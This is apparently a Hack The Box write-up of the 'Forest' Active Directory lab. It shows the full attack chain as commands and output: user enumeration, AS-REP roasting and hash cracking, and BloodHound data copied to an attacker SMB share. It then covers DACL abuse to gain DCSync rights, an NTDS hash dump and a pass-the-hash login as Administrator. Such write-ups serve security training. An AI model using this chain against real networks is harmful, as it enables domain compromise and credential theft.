HTB - Forest
Enumeration
Scope
IP Address: 10.10.10.161
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
5985/tcp open wsman
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-08 11:55:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2024-07-08T04:55:24-07:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m49s
| smb2-time:
| date: 2024-07-08T11:55:26
|_ start_date: 2024-07-08T11:39:10
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required* Open ports: 88 - 135 - 139 - 389 - 445 - 5985
* UDP Open ports: 88 - 123 - 389
* Services:
* Versions:
* Important Notes:Domain: htb.local - Windows Server 2016 Standard 14393 - FQDN: FOREST.htb.localEnumeration
SMB
smb enumerate didn't give any useful information
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.161 445 FOREST [+] htb.local\:
SMB 10.10.10.161 445 FOREST [-] Error enumerating shares: STATUS_ACCESS_DENIED RPC
I managed to enumerate the domain users with rpcclient
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]I have to create users list and attempt further enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ cat user | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santiInitial Access
Attempting the wordlist, we get from rpc enumeration against kerberos
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ kerbrute userenum --dc $ip -d htb.local -t 100 -o kerbrute.list ./users.lst
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/08/24 - Ronnie Flathers @ropnop
2024/07/08 07:57:51 > Using KDC(s):
2024/07/08 07:57:51 > 10.10.10.161:88
2024/07/08 07:57:51 > [+] VALID USERNAME: Administrator@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailboxc3d7722@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailboxc0a90c9@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailboxfc9daad@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox670628e@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailboxfd87238@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox83d6781@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailboxb01ac64@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox6ded678@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox968e74d@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox7108a4e@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: lucinda@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: HealthMailbox0659cc1@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: sebastien@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: santi@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: andy@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: mark@htb.local
2024/07/08 07:57:51 > [+] VALID USERNAME: svc-alfresco@htb.local
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ cat kerbrute.list | awk '{print $7}' | cut -d@ -f1 | tee -a final.lst
Administrator
HealthMailboxc3d7722
HealthMailboxc0a90c9
HealthMailboxfc9daad
HealthMailbox670628e
HealthMailboxfd87238
HealthMailbox83d6781
HealthMailboxb01ac64
HealthMailbox6ded678
HealthMailbox968e74d
HealthMailbox7108a4e
lucinda
HealthMailbox0659cc1
sebastien
santi
andy
mark
svc-alfrescoThe next step in my mind that I will attempt ASREP-Roasting against the users we found
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-GetNPUsers htb.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile final.lst
<snip>
$krb5asrep$23$svc-alfresco@HTB.LOCAL:a473debb50bf904fbeb3373b6f4af273$7a560ca1c022b7ac876daf73cf210638777af7e21167a0041e8366a9ca4911646d8508c752e39380dd328584e1d58e7a99a9b78c92513a91588f98930656268f97e9a794360788fad1ef12994ae12ff6666bcc105c1b9c1f998e0e0848f84201728162f3bc8e2936bec57c7f90b71aedd27d81ec7617ea476aa2074132daa142aaa819e801f16d00a3ada0c4906aab0a19bf94441eb7c51f81e8ad6c293d0f0a5ab51a50741b86bb43a5129fb4d6971f4e72ead6255d3b1933563dfe8a3709adea833a3b5e4833c7aecff174df9ab35a0a2cac8a67c7df82439db9ccba053ee8b106e019ba8I will then fire up hashcat and try to crack this hash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt
$krb5asrep$23$svc-alfresco@HTB.LOCAL:a473debb50bf904fbeb3373b6f4af273$7a560ca1c022b7ac876daf73cf210638777af7e21167a0041e8366a9ca4911646d8508c752e39380dd328584e1d58e7a99a9b78c92513a91588f98930656268f97e9a794360788fad1ef12994ae12ff6666bcc105c1b9c1f998e0e0848f84201728162f3bc8e2936bec57c7f90b71aedd27d81ec7617ea476aa2074132daa142aaa819e801f16d00a3ada0c4906aab0a19bf94441eb7c51f81e8ad6c293d0f0a5ab51a50741b86bb43a5129fb4d6971f4e72ead6255d3b1933563dfe8a3709adea833a3b5e4833c7aecff174df9ab35a0a2cac8a67c7df82439db9ccba053ee8b106e019ba8f:s3rvice
Session..........: hashcat
Status...........: Cracked┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ evil-winrm -i $ip -u svc-alfresco -p 's3rvice'
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> *Evil-WinRM* PS C:\Users\svc-alfresco> type Desktop\user.txt
c547a655316215e19xxxxxxxxxxxxxxxxUser Flag: c547a655316215e19xxxxxxxxxxxxxxxx
Privilege Escalation
In active directory enumeration, I'm used to run bloodhound.py as soon as possible if I obtain valid credentials but this time it failed, So I uploaded SharpHound.exe to the machine alternatively
*Evil-WinRM* PS C:\Users\svc-alfresco> .\SharpHound.exe -c All --zipfilename forest
<snip>
2024-07-08T05:22:16.0093511-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 51 MB RAM
2024-07-08T05:22:16.0093511-07:00|INFORMATION|Enumeration finished in 00:00:44.7988005
2024-07-08T05:22:16.1343445-07:00|INFORMATION|SharpHound Enumeration Completed at 5:22 AM on 7/8/2024! Happy Graphing!I will then start smb server and move the zip file generated to my attack host to upload it to bloodhound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-smbserver -smb2support share . -username blind0bandit -password blind0bandit
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsedAuthenticate the windows box to my kali machine and then move the file
*Evil-WinRM* PS C:\Users\svc-alfresco> net use n: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco> move 20240708052215_forest.zip n:First, I searched for svc-alfresco account and click on Reachable High Value Targets as its value took my attention
svc-alfresco is a member of Service accounts which is a member of PRIVILEGED IT ACCOUNTS which is a member of ACCOUNT OPERATORS. It's a nested group membership :)
So, I can say that svc-alfresco is a member of Account operators group which is high privileged group.
Further enumeration about
Account operationsgroup in bloodhound showed that It hasGenericAllonEXCHANGE WINDOWS PERMISSIONSand that group hasWriteDaclon the domainGenericAll: It means a have full control on the object and in our situation, It can be abused by adding ourselves to that groupWriteDacl: It means that I can modify the object discretionary Access control listDACLand in our situation It can be abused by granting ourselvesDCSyncrights to be able to dumpntdsdatabase and get the hash of administrator
we can use PowerView.ps1 to abuse GenericAll & WriteDacl but I will use it only on GenericAll and use DCSync tool developed by n00py to make the attack easier
The main reason why I didn't use
PowerViewto modifyDACLis that I struggled solving this machine before as there is a script that reset everything to default settings and even you're fast, you might fail
Clone the repository from github to /opt directory
┌──(kali㉿kali)-[/opt]
└─$ sudo git clone https://github.com/n00py/DCSync.git Use net command to see current group membership
*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco
<snip>
Global Group memberships *Domain Users *Service AccountsExecute the following commands to add ourselves to EXCHANGE WINDOWS PERMISSIONS Group
*Evil-WinRM* PS C:\Users\svc-alfresco> upload PowerView.ps1
import-module .\PowerView.ps1
$pass = ConvertTo-SecureString -Force -AsPlainText 's3rvice'
$cred = New-Object System.Management.Automation.PSCredential("htb.local\svc-alfresco", $pass)
Add-DomainGroupMember -Identity 'EXCHANGE WINDOWS PERMISSIONS' -Members 'svc-alfresco' -Credential $credVerify
*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco
<snip>
Global Group memberships *Exchange Windows Perm*Domain Users
*Service Accounts
The command completed successfully.DSCync.pyneed some options we need to getFQDN
distinguishedname
We get the FQDN from Nmap Script Scan before => Forest.htb.local
And for distinguishedname, we can get using PowerView
*Evil-WinRM* PS C:\Users\svc-alfresco> Get-DomainUser -Identity svc-alfresco | select-Object -Property distinguishedname
distinguishedname
-----------------
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=localNow, we're ready to Start the attack.
I run the tool and fire-up crackmapexec in one-linear cause there is a script that will reset the settings as I said before
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ python3 /opt/DCSync/DCSync.py -dc forest.htb.local -t "CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local" htb.local\\svc-alfresco:'s3rvice'; crackmapexec smb $ip -u svc-alfresco -p 's3rvice' --ntds
[*] Starting DCSync Attack against CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
[*] Initializing LDAP connection to forest.htb.local
[*] Using htb.local\svc-alfresco account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Querying domain security descriptor
[*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20240708-102656.restore
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\svc-alfresco:s3rvice
SMB 10.10.10.161 445 FOREST [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB 10.10.10.161 445 FOREST [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.10.10.161 445 FOREST htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb4xxxxxxxxxxxxxx:::
SMB 10.10.10.161 445 FOREST Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
SMB 10.10.10.161 445 FOREST DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
SMB 10.10.10.161 445 FOREST htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
SMB 10.10.10.161 445 FOREST htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
SMB 10.10.10.161 445 FOREST htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
SMB 10.10.10.161 445 FOREST htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
SMB 10.10.10.161 445 FOREST htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
SMB 10.10.10.161 445 FOREST htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
SMB 10.10.10.161 445 FOREST htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
SMB 10.10.10.161 445 FOREST FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:16b31bf83c954c24b824a6c34b81f5eb:::
SMB 10.10.10.161 445 FOREST EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::Access the machine as SYSTEM
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-psexec htb.local/administrator@$ip -hashes :32693b11e6aa90eb4xxxxxxxxxxxxxx
<snip>
C:\Windows\system32> And finally get the root flag :)
C:\Windows\system32> cd C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop> type root.txt
689637a422c46e0e07xxxxxxxxxxxxxxxxxxxRoot Flag: 689637a422c46e0e07xxxxxxxxxxxxxxxxxxx
Last updated
